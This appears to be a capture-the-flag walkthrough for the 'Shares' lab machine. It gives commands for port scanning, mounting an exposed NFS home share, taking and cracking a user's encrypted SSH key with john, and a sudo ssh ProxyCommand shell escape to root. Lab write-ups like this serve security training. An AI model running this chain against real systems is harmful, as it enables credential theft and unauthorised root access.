Shares | Hack World

nmap

mkdir nmap
sudo rustscan -a 172.31.1.7 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan

A file system is open on port 2049, and ssh is weirdly open on port 27853

Looks like we can mount the home folder of user amir

We can mount it by executing the following

mkdir /tmp/amir
sudo mount -t nfs 172.31.1.7:/home/amir /tmp/amir

Upon digging in the file system, you will notice there's an ssh key inside .ssh folder.

Copy id_rsa to your working directory, and chmod it.

cp id_rsa ~/infosec/cyberseclabs/shares/amir_id_rsa
chmod +x amir_id_rsa

The ssh key is encrypted, it means we have to crack this with john

ssh2john amir_id_rsa > amir_id_rsa.ssh2john
john amir_id_rsa.ssh2john -w=/opt/wordlist/rockyou.txt

After a few seconds, you will be able to get the password.

Using the SSH key, the cracked password, and the knowledge of user amir being existed. Now we can log in. Sweet :D

We can execute python3 as user amy

We can leverage that and gain a shell as amy

And with user amy, we can run sudo command with ssh

Now we can gain root, by executing the following

sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x

Enjoy your root privilege. :D

Last updated 3 years ago

Was this helpful?